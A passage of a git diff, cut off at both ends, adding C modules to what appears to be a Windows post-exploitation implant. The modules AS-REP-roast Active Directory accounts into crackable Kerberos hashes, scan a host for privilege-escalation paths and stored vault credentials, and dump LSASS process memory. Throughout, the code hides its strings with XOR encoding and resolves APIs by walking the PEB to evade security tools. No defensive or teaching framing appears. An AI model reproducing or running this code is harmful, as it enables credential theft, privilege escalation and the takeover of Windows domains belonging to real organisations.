LDAP_SCOPE_SUBTREE, filter, attrs, 0, &res) != LDAP_SUCCESS) + { + free(base_dn); + ldap_unbind(ld); + return snprintf(output_buf, output_size, "[-] LDAP search failed\n"), -1; + } + free(base_dn); + + size_t pos = 0; + int found = 0; + + /* Seed nonce from time */ + srand((unsigned)GetTickCount()); + + for (LDAPMessage *e = ldap_first_entry(ld, res); e; e = ldap_next_entry(ld, e)) + { + char **sam = ldap_get_values(ld, e, "sAMAccountName"); + if (!sam || !sam[0]) + { + if (sam) + ldap_value_free(sam); + continue; + } + + uint32_t nonce = (uint32_t)rand() ^ ((uint32_t)GetTickCount() << 16); + + size_t asreq_len = 0; + uint8_t *asreq = build_asreq(sam[0], realm, KERB_ETYPE_RC4_HMAC_NT, + nonce, &asreq_len); + if (!asreq) + { + ldap_value_free(sam); + continue; + } + + size_t resp_len = 0; + uint8_t *resp = send_asreq(dc_host, asreq, asreq_len, &resp_len); + free(asreq); + + if (!resp) + { + ldap_value_free(sam); + opsec_jitter(); + continue; + } + + /* resp[0] should be 0x6b (APPLICATION 11 = AS-REP) + If 0x7e (APPLICATION 30 = KRB-ERROR) account requires pre-auth */ + if (resp_len > 0 && resp[0] == 0x6b) + { + size_t cipher_len = 0; + const uint8_t *cipher = asrep_cipher(resp, resp_len, &cipher_len); + if (cipher && cipher_len >= 17) + { + /* $krb5asrep$23$user@REALM$$ */ + int n; + { + char _ka[12]; + _ka[0] = '$'; + _ka[1] = 'k'; + _ka[2] = 'r'; + _ka[3] = 'b'; + _ka[4] = '5'; + _ka[5] = 'a'; + _ka[6] = 's'; + _ka[7] = 'r'; + _ka[8] = 'e'; + _ka[9] = 'p'; + _ka[10] = '$'; + _ka[11] = '\0'; + n = snprintf(output_buf + pos, output_size - pos, + "%s23$%s@%s$", _ka, sam[0], realm); + } + pos += (n > 0) ? (size_t)n : 0; + hex_append(output_buf, output_size, &pos, cipher, 16); + if (pos < output_size - 1) + output_buf[pos++] = '$'; + hex_append(output_buf, output_size, &pos, cipher + 16, cipher_len - 16); + if (pos < output_size - 1) + output_buf[pos++] = '\n'; + found++; + } + } + + free(resp); + ldap_value_free(sam); + opsec_jitter(); + } + + ldap_msgfree(res); + ldap_unbind(ld); + + if (found == 0 && pos == 0) + pos += snprintf(output_buf + pos, output_size - pos, + "[*] no AS-REP roastable accounts found\n"); + + if (pos < output_size) + output_buf[pos] = '\0'; + return (int)pos; +} diff --git a/agent/src/commands/lpe_check.c b/agent/src/commands/lpe_check.c new file mode 100644 index 0000000..df13441 --- /dev/null +++ b/agent/src/commands/lpe_check.c @@ -0,0 +1,412 @@ +#include "adv_lazy.h" +#include "evs_strings.h" +#include "peb_walk.h" +#include +#include +#include +#include +#include + +typedef BOOL (WINAPI *fn_CredEnum_t)(LPCSTR, DWORD, DWORD *, void ***); +typedef VOID (WINAPI *fn_CredFree_t)(PVOID); + +/* CREDENTIAL layout */ +typedef struct { + DWORD Flags; + DWORD Type; + LPSTR TargetName; + LPSTR Comment; + FILETIME LastWritten; + DWORD CredentialBlobSize; + LPBYTE CredentialBlob; + DWORD Persist; + DWORD AttributeCount; + PVOID Attributes; + LPSTR TargetAlias; + LPSTR UserName; +} CRED_A; + +/* impersonation token required by AccessCheck */ +static HANDLE _dup_imp(void) +{ + const adv_api_t *adv = adv_get(); + HANDLE h = NULL, hi = NULL; + if (!adv->OpenProcessToken || + !adv->OpenProcessToken(GetCurrentProcess(), TOKEN_DUPLICATE|TOKEN_QUERY, &h)) + return NULL; + SECURITY_ATTRIBUTES sa = {sizeof(sa)}; + if (adv->DuplicateTokenEx) + adv->DuplicateTokenEx(h, TOKEN_ALL_ACCESS, &sa, + SecurityImpersonation, TokenImpersonation, &hi); + CloseHandle(h); + return hi; +} + +/* returns 1 if current user can write to path (file or dir) */ +static int _can_write(const char *path, HANDLE himp) +{ + if (!himp) return 0; + PSECURITY_DESCRIPTOR pSD = NULL; + DWORD err = GetNamedSecurityInfoA((LPSTR)path, SE_FILE_OBJECT, + DACL_SECURITY_INFORMATION|OWNER_SECURITY_INFORMATION|GROUP_SECURITY_INFORMATION, + NULL, NULL, NULL, NULL, &pSD); + if (err != ERROR_SUCCESS) return 0; + DWORD mask = FILE_WRITE_DATA | FILE_APPEND_DATA; + GENERIC_MAPPING gm = {FILE_GENERIC_READ, FILE_GENERIC_WRITE, + FILE_GENERIC_EXECUTE, FILE_ALL_ACCESS}; + MapGenericMask(&mask, &gm); + PRIVILEGE_SET ps; DWORD ps_sz = sizeof(ps); + DWORD granted = 0; BOOL ok = FALSE; + AccessCheck(pSD, himp, mask, &gm, &ps, &ps_sz, &granted, &ok); + LocalFree(pSD); + return ok ? 1 : 0; +} + +/* append-safe snprintf wrapper */ +#define APPF(buf, off, sz, ...) \ + do { int _n = snprintf((buf)+*(off), (sz)-*(off), __VA_ARGS__); \ + if (_n > 0) *(off) += (size_t)_n; } while(0) + +/* ------------------------------------------------------------------ */ +/* 1. SeImpersonatePrivilege */ +/* ------------------------------------------------------------------ */ + +static void _chk_seimpersonate(char *out, size_t *off, size_t sz) +{ + const adv_api_t *adv = adv_get(); + HANDLE h = NULL; + if (!adv->OpenProcessToken || + !adv->OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &h)) return; + DWORD need = 0; + GetTokenInformation(h, TokenPrivileges, NULL, 0, &need); + TOKEN_PRIVILEGES *tp = (TOKEN_PRIVILEGES *)malloc(need); + if (!tp) { CloseHandle(h); return; } + if (GetTokenInformation(h, TokenPrivileges, tp, need, &need)) { + for (DWORD i = 0; i < tp->PrivilegeCount; i++) { + char name[64] = {0}; DWORD nl = sizeof(name); + if (adv->LookupPrivilegeNameA) + adv->LookupPrivilegeNameA(NULL, &tp->Privileges[i].Luid, name, &nl); + char _sp[24]; { volatile unsigned char _k = EVS_KEY; + for (int _i = 0; _i < (int)sizeof(EVS_str_SeImpersonatePrivilege); _i++) + _sp[_i] = (char)(EVS_str_SeImpersonatePrivilege[_i] ^ _k); + _sp[sizeof(EVS_str_SeImpersonatePrivilege)] = '\0'; } + if (_stricmp(name, _sp) == 0) { + BOOL en = (tp->Privileges[i].Attributes & + (SE_PRIVILEGE_ENABLED|SE_PRIVILEGE_ENABLED_BY_DEFAULT)) != 0; + APPF(out, off, sz, "[SeImpersonate] %s%s\n", + en ? "ENABLED" : "present/disabled", + en ? " → gs (pipe impersonation)" : ""); + free(tp); CloseHandle(h); return; + } + } + } + free(tp); CloseHandle(h); + APPF(out, off, sz, "[SeImpersonate] not held\n"); +} + +/* ------------------------------------------------------------------ */ +/* 2. AlwaysInstallElevated */ +/* ------------------------------------------------------------------ */ + +static void _chk_aie(char *out, size_t *off, size_t sz) +{ + /* Decode registry path + value name from EVS to avoid plaintext in .rdata */ + volatile unsigned char _k = EVS_KEY; + char _rp[52], _rv[22]; + for (int _i = 0; _i < (int)sizeof(EVS_str_reg_installer_policy); _i++) + _rp[_i] = (char)(EVS_str_reg_installer_policy[_i] ^ _k); + _rp[sizeof(EVS_str_reg_installer_policy)] = '\0'; + for (int _i = 0; _i < (int)sizeof(EVS_str_AlwaysInstallElevated); _i++) + _rv[_i] = (char)(EVS_str_AlwaysInstallElevated[_i] ^ _k); + _rv[sizeof(EVS_str_AlwaysInstallElevated)] = '\0'; + + DWORD hklm = 0, hkcu = 0, cb = sizeof(DWORD); + RegGetValueA(HKEY_LOCAL_MACHINE, _rp, _rv, RRF_RT_REG_DWORD, NULL, &hklm, &cb); + cb = sizeof(DWORD); + RegGetValueA(HKEY_CURRENT_USER, _rp, _rv, RRF_RT_REG_DWORD, NULL, &hkcu, &cb); + SecureZeroMemory(_rp, sizeof(_rp)); SecureZeroMemory(_rv, sizeof(_rv)); + + if (hklm == 1 && hkcu == 1) { + char _t1[] = {'[','A','I','E',']',' ','V','U','L','N','E','R','A','B','L','E', + ' ','(','H','K','L','M','+','H','K','C','U','=','1',')','\n',0}; + APPF(out, off, sz, "%s", _t1); + } else + APPF(out, off, sz, "[AIE] not set (HKLM=%lu HKCU=%lu)\n", hklm, hkcu); +} + +/* ------------------------------------------------------------------ */ +/* 3 & 4. Service checks (unquoted paths + writable binaries) */ +/* Opens SCM once, does both checks in one pass. */ +/* ------------------------------------------------------------------ */ + +static void _extract_bin(const char *path, char *bin, size_t bin_sz) +{ + if (!path || !path[0]) { bin[0] = 0; return; } + if (path[0] == '"') { + const char *e = strchr(path + 1, '"'); + size_t l = e ? (size_t)(e - path - 1) : strlen(path + 1); + if (l >= bin_sz) l = bin_sz - 1; + strncpy(bin, path + 1, l); bin[l] = 0; + } else { + const char *sp = strchr(path, ' '); + size_t l = sp ? (size_t)(sp - path) : strlen(path); + if (l >= bin_sz) l = bin_sz - 1; + strncpy(bin, path, l); bin[l] = 0; + } +} + +static void _chk_services(char *out, size_t *off, size_t sz, HANDLE himp) +{ + const adv_api_t *adv = adv_get(); + if (!adv->OpenSCManagerA || !adv->EnumServicesStatusExA || + !adv->OpenServiceA || !adv->QueryServiceConfigA || + !adv->CloseServiceHandle) + return; + + SC_HANDLE scm = adv->OpenSCManagerA(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE); + if (!scm) { APPF(out, off, sz, "[svc] SCM open failed: %lu\n", GetLastError()); return; } + + DWORD bytes = 0, count = 0, resume = 0; + adv->EnumServicesStatusExA(scm, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, + SERVICE_STATE_ALL, NULL, 0, &bytes, &count, &resume, NULL); + BYTE *buf = (BYTE *)malloc(bytes); + if (!buf) { adv->CloseServiceHandle(scm); return; } + + int found_unq = 0, found_bin = 0; + + if (adv->EnumServicesStatusExA(scm, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, + SERVICE_STATE_ALL, buf, bytes, &bytes, &count, &resume, NULL)) + { + ENUM_SERVICE_STATUS_PROCESS *svcs = (ENUM_SERVICE_STATUS_PROCESS *)buf; + for (DWORD i = 0; i < count && *off < sz - 1; i++) { + SC_HANDLE svc = adv->OpenServiceA(scm, svcs[i].lpServiceName, + SERVICE_QUERY_CONFIG); + if (!svc) continue; + DWORD cfg_sz = 0; + adv->QueryServiceConfigA(svc, NULL, 0, &cfg_sz); + QUERY_SERVICE_CONFIGA *cfg = (QUERY_SERVICE_CONFIGA *)malloc(cfg_sz); + if (!cfg) { adv->CloseServiceHandle(svc); continue; } + + if (adv->QueryServiceConfigA(svc, cfg, cfg_sz, &cfg_sz)) { + const char *raw = cfg->lpBinaryPathName; + if (raw && raw[0]) { + char bin[MAX_PATH] = {0}; + _extract_bin(raw, bin, sizeof(bin)); + + /* check writable service binary */ + if (bin[0] && GetFileAttributesA(bin) != INVALID_FILE_ATTRIBUTES + && _can_write(bin, himp)) { + const char *acct = cfg->lpServiceStartName + ? cfg->lpServiceStartName : "?"; + APPF(out, off, sz, "[svc-write] %s account=%s\n binary: %s\n", + svcs[i].lpServiceName, acct, bin); + found_bin = 1; + } + + /* check unquoted path with spaces */ + if (raw[0] != '"' && strchr(raw, ' ')) { + /* enumerate hijack candidates: split on spaces */ + char work[MAX_PATH * 2]; + strncpy(work, raw, sizeof(work) - 1); + work[sizeof(work) - 1] = 0; + char *p = work; + /* skip past first token that has no space (e.g. "C:\") */ + while (*p) { + char *sp = strchr(p, ' '); + if (!sp) break; + *sp = 0; /* temp null at space */ + /* candidate exe = work + ".exe" */ + char cand[MAX_PATH + 4]; + snprintf(cand, sizeof(cand), "%s.exe", work); + /* check parent dir writable (to drop the exe) */ + char parent[MAX_PATH]; + strncpy(parent, work, sizeof(parent) - 1); + char *sl = strrchr(parent, '\\'); + if (sl) { *sl = 0; + if (GetFileAttributesA(parent) != INVALID_FILE_ATTRIBUTES + && _can_write(parent, himp)) { + APPF(out, off, sz, + "[unquoted] %s\n drop: %s\n dir writable: %s\n", + svcs[i].lpServiceName, cand, parent); + found_unq = 1; + } + } + *sp = ' '; /* restore */ + p = sp + 1; + } + } + } + } + free(cfg); + adv->CloseServiceHandle(svc); + } + } + free(buf); + adv->CloseServiceHandle(scm); + + if (!found_bin) APPF(out, off, sz, "[svc-write] none writable\n"); + if (!found_unq) APPF(out, off, sz, "[unquoted] none exploitable\n"); +} + +/* ------------------------------------------------------------------ */ +/* 5. Writable autorun paths (HKLM/HKCU Run keys) */ +/* ------------------------------------------------------------------ */ + +static void _chk_autoruns(char *out, size_t *off, size_t sz, HANDLE himp) +{ + static const char *keys[] = { + "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", + "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run", + NULL + }; + HKEY roots[2] = { HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER }; + const char *rnames[2] = { "HKLM", "HKCU" }; + int found = 0; + + for (int r = 0; r < 2; r++) { + for (int k = 0; keys[k] && *off < sz - 1; k++) { + HKEY hk = NULL; + if (RegOpenKeyExA(roots[r], keys[k], 0, KEY_READ, &hk) != ERROR_SUCCESS) + continue; + DWORD idx = 0; + char vname[256], vdata[1024]; + DWORD vn, vd, vtype; + while (1) { + vn = sizeof(vname); vd = sizeof(vdata); + if (RegEnumValueA(hk, idx++, vname, &vn, NULL, + &vtype, (LPBYTE)vdata, &vd) != ERROR_SUCCESS) break; + if (vtype != REG_SZ && vtype != REG_EXPAND_SZ) continue; + char bin[MAX_PATH] = {0}; + _extract_bin(vdata, bin, sizeof(bin)); + if (bin[0] && GetFileAttributesA(bin) != INVALID_FILE_ATTRIBUTES + && _can_write(bin, himp)) { + /* HKCU = persistence only (runs as current user) + HKLM = LPE vector (runs at system startup / all users) */ + const char *tag = (r == 0) ? "[autorun-lpe]" : "[autorun-persist]"; + APPF(out, off, sz, "%s %s\\%s → %s: %s\n", + tag, rnames[r], keys[k], vname, bin); + found = 1; + } + } + RegCloseKey(hk); + } + } + if (!found) APPF(out, off, sz, "[autorun] none writable\n"); +} + +/* ------------------------------------------------------------------ */ +/* 6. Stored credentials (CredEnumerate — fully dynamic) */ +/* ------------------------------------------------------------------ */ + +static void _chk_creds(char *out, size_t *off, size_t sz) +{ + char _da[13]; + EVS_D(_da, EVS_dll_advapi32); + HMODULE had = _peb_module(_da); + SecureZeroMemory(_da, sizeof(_da)); + if (!had) return; + char s_ce[15], s_cf[9]; + EVS_D(s_ce, EVS_fn_CredEnumerateA); + EVS_D(s_cf, EVS_fn_CredFree); + fn_CredEnum_t pCE = (fn_CredEnum_t)(void*)GetProcAddress(had, s_ce); + SecureZeroMemory(s_ce, sizeof(s_ce)); + fn_CredFree_t pCF = (fn_CredFree_t)(void*)GetProcAddress(had, s_cf); + SecureZeroMemory(s_cf, sizeof(s_cf)); + if (!pCE || !pCF) return; + + DWORD count = 0; CRED_A **creds = NULL; + if (!pCE(NULL, 0, &count, (void***)&creds)) { + APPF(out, off, sz, "[creds] none (or access denied)\n"); + return; + } + if (count == 0) { + APPF(out, off, sz, "[creds] vault empty\n"); + } else { + APPF(out, off, sz, "[creds] %lu entry/entries:\n", count); + for (DWORD i = 0; i < count && *off < sz - 1; i++) { + CRED_A *c = creds[i]; + /* type 1=generic 2=domain_password 3=domain_cert */ + APPF(out, off, sz, " [%lu] target=%-40s user=%s blob=%lu bytes\n", + c->Type, + c->TargetName ? c->TargetName : "(null)", + c->UserName ? c->UserName : "(null)", + c->CredentialBlobSize); + } + } + pCF(creds); +} + +/* ------------------------------------------------------------------ */ +/* 0. UAC limited-admin token detection */ +/* TokenElevationTypeLimited = user is local admin running filtered */ +/* medium-IL token → UAC bypass + token steal → SYSTEM possible. */ +/* ------------------------------------------------------------------ */ + +static void _chk_uac_limited(char *out, size_t *off, size_t sz) +{ + HANDLE htok = NULL; + { const adv_api_t *_a = adv_get(); + if (!_a->OpenProcessToken || !_a->OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htok)) return; } + + TOKEN_ELEVATION_TYPE etype = TokenElevationTypeDefault; + DWORD cb = sizeof(etype); + GetTokenInformation(htok, TokenElevationType, &etype, cb, &cb); + + /* Integrity level */ + DWORD need = 0; + GetTokenInformation(htok, TokenIntegrityLevel, NULL, 0, &need); + TOKEN_MANDATORY_LABEL *tml = (TOKEN_MANDATORY_LABEL *)malloc(need); + DWORD il_rid = 0; + if (tml && GetTokenInformation(htok, TokenIntegrityLevel, tml, need, &need)) + il_rid = *GetSidSubAuthority(tml->Label.Sid, + *GetSidSubAuthorityCount(tml->Label.Sid) - 1); + free(tml); + CloseHandle(htok); + + const char *il_str = il_rid >= 0x4000 ? "SYSTEM" + : il_rid >= 0x3000 ? "HIGH" + : il_rid >= 0x2000 ? "MEDIUM" + : il_rid >= 0x1000 ? "LOW" + : "UNTRUSTED"; + + if (etype == TokenElevationTypeLimited) { + APPF(out, off, sz, + "[UAC] VULNERABLE - limited admin token (IL=%s)\n" + " → run: pe (UAC bypass + token steal → SYSTEM)\n" + " methods: COM moniker / fodhelper / sdclt (auto-fallback)\n", + il_str); + } else if (etype == TokenElevationTypeFull) { + APPF(out, off, sz, + "[UAC] already elevated (IL=%s) → run: gs\n", il_str); + } else { + APPF(out, off, sz, + "[UAC] default token (IL=%s) - not local admin, UAC bypass unavailable\n", + il_str); + } +} + +/* ------------------------------------------------------------------ */ +/* Entry point */ +/* ------------------------------------------------------------------ */ + +int cmd_lpe_check(const char *args, char *out, size_t sz) +{ + (void)args; + memset(out, 0, sz); + size_t off = 0; + + APPF(out, &off, sz, "=== LPE CHECK ===\n"); + + HANDLE himp = _dup_imp(); + + _chk_uac_limited(out, &off, sz); + _chk_seimpersonate(out, &off, sz); + _chk_aie(out, &off, sz); + _chk_services(out, &off, sz, himp); + _chk_autoruns(out, &off, sz, himp); + _chk_creds(out, &off, sz); + + if (himp) CloseHandle(himp); + return 0; +} diff --git a/agent/src/commands/lsass.c b/agent/src/commands/lsass.c new file mode 100644 index 0000000..c9582de --- /dev/null +++ b/agent/src/commands/lsass.c @@ -0,0 +1,399 @@ +#include "commands.h" +#include "adv_lazy.h" +#include "evs_strings.h" +#include "peb_walk.h" +#include +#include +#include +#include +#include +#include + +#ifndef NTSTATUS +typedef LONG NTSTATUS; +#endif + +/* NtReadVirtualMemory — removes ReadProcessMemory from IAT */ +typedef NTSTATUS (NTAPI *_lNtRVM_t)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T); +static _lNtRVM_t _lsass_nrvm(void) { + static _lNtRVM_t fn = NULL; + if (!fn) { + char fs[24], ns[12]; volatile unsigned char k = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_NtReadVirtualMemory); i++) fs[i] = (char)(EVS_fn_NtReadVirtualMemory[i] ^ k); + fs[sizeof(EVS_fn_NtReadVirtualMemory)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_ntdll); i++) ns[i] = (char)(EVS_dll_ntdll[i] ^ k); + ns[sizeof(EVS_dll_ntdll)] = '\0'; + HMODULE m = _peb_module(ns); SecureZeroMemory(ns, sizeof(ns)); + if (m) fn = (_lNtRVM_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + return fn; +} + +/* minidump structures, packed */ +#pragma pack(push, 4) + +typedef struct { uint32_t Sig; uint16_t Ver; uint16_t ImplVer; + uint32_t N; uint32_t DirRva; uint32_t Csum; + uint32_t Ts; uint64_t Flags; } md_hdr_t; /* 32 */ + +typedef struct { uint32_t Sz; uint32_t Rva; } md_loc_t; /* 8 */ +typedef struct { uint32_t Type; md_loc_t Loc; } md_dir_t; /* 12 */ + +typedef struct { + uint16_t Arch; uint16_t Level; uint16_t Rev; + uint8_t NCpu; uint8_t ProdType; + uint32_t Major; uint32_t Minor; uint32_t Build; + uint32_t Platform; uint32_t CsdRva; + uint16_t Suite; uint16_t Rsv2; + uint64_t CpuFeatures[2]; +} md_sysinfo_t; /* 48 */ + +typedef struct { + uint64_t Base; uint32_t Size; uint32_t Chk; + uint32_t Ts; uint32_t NameRva; + uint8_t VerInfo[52]; /* VS_FIXEDFILEINFO — zeroed */ + md_loc_t CvRec; md_loc_t MiscRec; + uint64_t Rsv0; uint64_t Rsv1; +} md_mod_t; /* 108 */ + +typedef struct { uint64_t Start; uint64_t DataSz; } md_range_t; /* 16 */ +typedef struct { uint64_t N; uint64_t BaseRva; } md_mem64_t; /* 16 */ + +#pragma pack(pop) + +#define MD_STREAM_SYSINFO 7 +#define MD_STREAM_MODLIST 4 +#define MD_STREAM_MEM64 9 + +static DWORD _find_lsass(void) +{ + char name[12] = {0}; + { volatile unsigned char _k = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_str_lsass_exe); i++) + name[i] = (char)(EVS_str_lsass_exe[i] ^ _k); } + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snap == INVALID_HANDLE_VALUE) return 0; + PROCESSENTRY32 pe = {sizeof(pe)}; + DWORD pid = 0; + if (Process32First(snap, &pe)) do { + if (_stricmp(pe.szExeFile, name) == 0) { pid = pe.th32ProcessID; break; } + } while (Process32Next(snap, &pe)); + CloseHandle(snap); + SecureZeroMemory(name, sizeof(name)); + return pid; +} + +static int _is_readable(DWORD prot) +{ + DWORD p = prot & 0xFF; + return p == PAGE_READONLY || p == PAGE_READWRITE || + p == PAGE_EXECUTE_READ || p == PAGE_EXECUTE_READWRITE || + p == PAGE_EXECUTE_WRITECOPY || p == PAGE_WRITECOPY; +} + +static BOOL _wf(HANDLE hf, const void *d, DWORD sz) +{ + DWORD w; + return WriteFile(hf, d, sz, &w, NULL) && w == sz; +} + +/* ===== Module collection ===== */ + +#define MAX_MODS 512 + +typedef struct { + uint64_t base; + uint32_t size; + uint32_t csum; + uint32_t ts; + WCHAR path[MAX_PATH]; + uint32_t path_bytes; /* byte length of path (no null) */ +} lsmod_t; + +static int _collect_mods(DWORD pid, HANDLE hp, lsmod_t *mods, int *out) +{ + HANDLE snap = CreateToolhelp32Snapshot( + TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, pid); + if (snap == INVALID_HANDLE_VALUE) return -1; + + int n = 0; + MODULEENTRY32 me = {sizeof(me)}; + if (Module32First(snap, &me)) do { + if (n >= MAX_MODS) break; + lsmod_t *m = &mods[n++]; + m->base = (uint64_t)(uintptr_t)me.modBaseAddr; + m->size = me.modBaseSize; + m->csum = 0; + m->ts = 0; + + /* Read PE header for precise timestamps + SizeOfImage */ + BYTE hdr[0x400]; + SIZE_T rd = 0; + { _lNtRVM_t _r = _lsass_nrvm(); + if (_r) _r(hp, me.modBaseAddr, hdr, sizeof(hdr), &rd); } + if (rd >= 0x40) { + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)(void *)hdr; + if (dos->e_magic == IMAGE_DOS_SIGNATURE) { + DWORD ne_off = (DWORD)dos->e_lfanew; + if (ne_off + sizeof(IMAGE_NT_HEADERS) <= rd) { + IMAGE_NT_HEADERS *nt = + (IMAGE_NT_HEADERS *)(void *)(hdr + ne_off); + if (nt->Signature == IMAGE_NT_SIGNATURE) { + m->ts = nt->FileHeader.TimeDateStamp; + m->csum = nt->OptionalHeader.CheckSum; + m->size = nt->OptionalHeader.SizeOfImage; + } + } + } + } + + int wlen = MultiByteToWideChar(CP_ACP, 0, me.szExePath, -1, + m->path, MAX_PATH); + m->path_bytes = (wlen > 1) ? (uint32_t)((wlen - 1) * 2) : 0; + + } while (Module32Next(snap, &me)); + + CloseHandle(snap); + *out = n; + return 0; +} + +/* ===== Memory region collection ===== */ + +#define MAX_REGS 8192 + +typedef struct { uint64_t start; uint64_t size; } mreg_t; + +static int _collect_regs(HANDLE hp, mreg_t *regs, int *out) +{ + int n = 0; + MEMORY_BASIC_INFORMATION mbi; + ULONG_PTR addr = 0; + + while (VirtualQueryEx(hp, (LPCVOID)addr, &mbi, sizeof(mbi)) == sizeof(mbi)) { + addr = (ULONG_PTR)mbi.BaseAddress + mbi.RegionSize; + if (mbi.State != MEM_COMMIT) continue; + if (mbi.Protect & PAGE_GUARD) continue; + if (!_is_readable(mbi.Protect)) continue; + if (n >= MAX_REGS) break; + regs[n].start = (uint64_t)(uintptr_t)mbi.BaseAddress; + regs[n].size = (uint64_t)mbi.RegionSize; + n++; + } + *out = n; + return 0; +} + +/* ===== Main dump function ===== */ + +int cmd_lsassdump(const char *out_path, char *output_buf, size_t output_size) +{ + char dump_path[MAX_PATH + 32]; + if (out_path && out_path[0]) { + strncpy(dump_path, out_path, sizeof(dump_path) - 1); + dump_path[sizeof(dump_path) - 1] = '\0'; + } else { + char tmp[MAX_PATH]; + GetTempPathA(sizeof(tmp), tmp); + snprintf(dump_path, sizeof(dump_path), "%s%08lx.tmp", tmp, (unsigned long)GetTickCount()); + } + + /* SeDebugPrivilege LUID={20,0} — constant on all NT */ + { + const adv_api_t *_a = adv_get(); + HANDLE _tok = NULL; + if (_a->OpenProcessToken && _a->AdjustTokenPrivileges && + _a->OpenProcessToken(GetCurrentProcess(), + TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &_tok)) { + TOKEN_PRIVILEGES _tp; + _tp.PrivilegeCount = 1; + _tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + _tp.Privileges[0].Luid.LowPart = 20; _tp.Privileges[0].Luid.HighPart = 0; + _a->AdjustTokenPrivileges(_tok, FALSE, &_tp, 0, NULL, NULL); + CloseHandle(_tok); + } + } + + DWORD pid = _find_lsass(); + if (!pid) { + snprintf(output_buf, output_size, + "[ld] target not found\n"); + return -1; + } + + HANDLE hp = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, + FALSE, pid); + if (!hp) { + snprintf(output_buf, output_size, + "[ld] OpenProcess(%lu) failed: %lu\n", + (unsigned long)pid, GetLastError()); + return -1; + } + + lsmod_t *mods = (lsmod_t *)calloc(MAX_MODS, sizeof(lsmod_t)); + mreg_t *regs = (mreg_t *)calloc(MAX_REGS, sizeof(mreg_t)); + if (!mods || !regs) { + free(mods); free(regs); CloseHandle(hp); return -1; + } + + int n_mods = 0, n_regs = 0; + _collect_mods(pid, hp, mods, &n_mods); + _collect_regs(hp, regs, &n_regs); + + /* Total bytes for all MINIDUMP_STRING entries (4-byte aligned) */ + uint32_t str_bytes = 0; + for (int i = 0; i < n_mods; i++) { + uint32_t raw = 4 + mods[i].path_bytes + 2; /* len(u32)+wchars+null */ + str_bytes += (raw + 3) & ~3u; + } + + /* + * File layout: + * [0] md_hdr_t 32 + * [32] md_dir_t × 3 36 + * [68] md_sysinfo_t 48 + * [116] uint32 n_mods 4 + * [120] md_mod_t × n_mods n*108 + * [+str] MINIDUMP_STRINGs str_bytes + * [+m64h] md_mem64_t 16 + * [+ranges] md_range_t × n_regs r*16 + * [+data] raw memory pages (BaseRva here) + */ + uint32_t off_sys = 68; + uint32_t off_mlist = 116; + uint32_t off_mods = 120; + uint32_t off_strs = off_mods + (uint32_t)n_mods * 108; + uint32_t off_m64 = off_strs + str_bytes; + uint32_t off_ranges = off_m64 + 16; + uint32_t off_data = off_ranges + (uint32_t)n_regs * 16; + + HANDLE hf = CreateFileA(dump_path, GENERIC_WRITE, 0, NULL, + CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (hf == INVALID_HANDLE_VALUE) { + free(mods); free(regs); CloseHandle(hp); + snprintf(output_buf, output_size, + "[ld] CreateFile(%s) failed: %lu\n", + dump_path, GetLastError()); + return -1; + } + + /* Header */ + md_hdr_t hdr = {0}; + hdr.Sig = 0x504d444dUL; /* 'MDMP' */ + hdr.Ver = 0xA793; + hdr.N = 3; + hdr.DirRva = 32; + hdr.Ts = GetTickCount(); + hdr.Flags = 2; /* MiniDumpWithFullMemory */ + _wf(hf, &hdr, sizeof(hdr)); + + /* Directory (3 streams) */ + md_dir_t dirs[3] = { + {MD_STREAM_SYSINFO, + {sizeof(md_sysinfo_t), off_sys}}, + {MD_STREAM_MODLIST, + {4 + (uint32_t)n_mods * 108 + str_bytes, off_mlist}}, + {MD_STREAM_MEM64, + {16 + (uint32_t)n_regs * 16, off_m64}}, + }; + _wf(hf, dirs, sizeof(dirs)); + + /* SystemInfo */ + md_sysinfo_t si = {0}; + si.Arch = 9; /* AMD64 */ + si.NCpu = 1; + si.Platform = 2; /* VER_PLATFORM_WIN32_NT */ + OSVERSIONINFOA osi = {sizeof(osi)}; + GetVersionExA(&osi); + si.Major = osi.dwMajorVersion; + si.Minor = osi.dwMinorVersion; + si.Build = osi.dwBuildNumber; + _wf(hf, &si, sizeof(si)); + + /* ModuleList: count */ + uint32_t nm = (uint32_t)n_mods; + _wf(hf, &nm, 4); + + /* ModuleList: entries */ + uint32_t name_rva = off_strs; + for (int i = 0; i < n_mods; i++) { + md_mod_t m = {0}; + m.Base = mods[i].base; + m.Size = mods[i].size; + m.Chk = mods[i].csum; + m.Ts = mods[i].ts; + m.NameRva = name_rva; + _wf(hf, &m, sizeof(m)); + uint32_t raw = 4 + mods[i].path_bytes + 2; + name_rva += (raw + 3) & ~3u; + } + + /* ModuleList: MINIDUMP_STRING entries */ + for (int i = 0; i < n_mods; i++) { + uint32_t len = mods[i].path_bytes; + _wf(hf, &len, 4); + _wf(hf, mods[i].path, len + 2); /* +2: null wchar */ + uint32_t raw = 4 + len + 2; + uint32_t padded = (raw + 3) & ~3u; + if (padded > raw) { + uint32_t pad = 0; + _wf(hf, &pad, padded - raw); + } + } + + /* Memory64List: header */ + md_mem64_t m64 = {(uint64_t)n_regs, (uint64_t)off_data}; + _wf(hf, &m64, sizeof(m64)); + + /* Memory64List: descriptors */ + for (int i = 0; i < n_regs; i++) { + md_range_t r = {regs[i].start, regs[i].size}; + _wf(hf, &r, sizeof(r)); + } + + /* Memory data — read LSASS pages and write sequentially */ + BYTE *rbuf = (BYTE 